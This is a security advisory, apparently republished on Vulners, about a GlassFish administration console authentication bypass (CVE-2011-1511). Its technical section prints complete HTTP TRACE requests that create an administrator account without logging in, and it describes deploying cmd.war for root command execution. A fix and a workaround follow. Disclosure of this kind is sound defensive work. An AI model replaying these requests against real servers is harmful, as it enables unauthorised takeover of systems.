Vulners
Lucene search
Oracle GlassFish Server Administration Bypass
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | Oracle GlassFish Server Administration Console Authentication Bypass | 12 May 201100:00 | – | zdt |
 | CVE-2011-1511 | 12 May 201100:00 | – | circl |
 | Oracle GlassFish Server Administration Console Authentication Bypass | 11 May 201100:00 | – | coresecurity |
 | Oracle GlassFish Server Administration Console Authentication Bypass (CVE-2011-1511) | 14 Oct 201200:00 | – | checkpoint_advisories |
| Oracle GlassFish Server Administration Console Authentication Bypass - Ver2 (CVE-2011-1511) | 26 Mar 201500:00 | – | checkpoint_advisories |
 | CVE-2011-1511 | 20 Jul 201122:36 | – | cve |
 | CVE-2011-1511 | 20 Jul 201122:36 | – | cvelist |
 | Oracle GlassFish Server - Administration Console Authentication Bypass | 12 May 201100:00 | – | exploitdb |
 | Oracle GlassFish Server - Administration Console Authentication Bypass | 12 May 201100:00 | – | exploitpack |
 | Oracle GlassFish Server Administrative Console Authentication Bypass | 12 May 201100:00 | – | nessus |
10
`=======
Summary
=======
Name: Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass Vulnerability
Release Date: 5 January 2012
Reference: NGS00106
Discoverer: David Spencer <[email protected]>
Vendor: Oracle
Vendor Reference:
Systems Affected: Oracle GlassFish Server 2.1 and 3
Risk: High
Status: Published
========
TimeLine
========
Discovered: 26 August 2011
Released: 26 August 2011
Approved: 26 August 2011
Reported: 26 August 2011
Fixed: July 2011
Published: 5 January 2012
===========
Description
===========
Core security released a bug in Oracle GlassFish Server Administration Console on 5th May 2011 which can be found here:
http://www.securityfocus.com/archive/1/517965/30/0/threaded
and here
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1511
The rating of this issue is classified as medium due to it only returning sensitive information. A full fix has been released by Oracle.
NGS found that it is possible to use this issue to create a GlassFish administrator account as an unauthenticated user.
=================
Technical Details
=================
There is a known authentication bypass in Glassfish, by using a TRACE method rather than a GET method it is possible to access data meant only for Glassfish administrators.
The following requests were used to create a new Glassfish administrator:
TRACE /common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&bare=true HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://10.65.78.211:4848/common/security/realms/manageUsers.jsf?name=admin-realm&configName=server-config&bare=true
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
This then gave access to the create user page, however it is important that when the submit button is pressed the resultant POST request be converted to a TRACE request.
TRACE /common/security/realms/manageUserNew.jsf?propertyForm%3ApropertySheet%3ApropertSectionTextField%3AuserIdProp%3AUserId=NGSSecure&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnewPasswordProp%3ANewPassword=Password!!&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AconfirmPasswordProp%3AConfirmPassword=Password!!&propertyForm%3AhelpKey=ref-filerealmusernew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=-2309913764624097582%3A-
2546877703812727807&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.source=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&bare=true&propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.ajax=true HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.65.78.211:4848/common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&
Content-Length: 0
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
Pragma: no-cache
Cache-Control: no-cache
This created a user called NGSSecure with a password of Password!!
NGS then logged on to the Glassfish administration console using this newly created user. Once logged on as this user it was possible to upload and deploy a website, NGS deployed cmd.war which allowed the user to run commands under the context of the GlassFish server which is root by default.
===============
Fix Information
===============
This issue has been fixed in GlassFish 3.1, a workaround also exists which is to disable the TRACE method on the administrator consoles web port
NGS Secure Research
http://www.ngssecure.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jan 2012 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.14646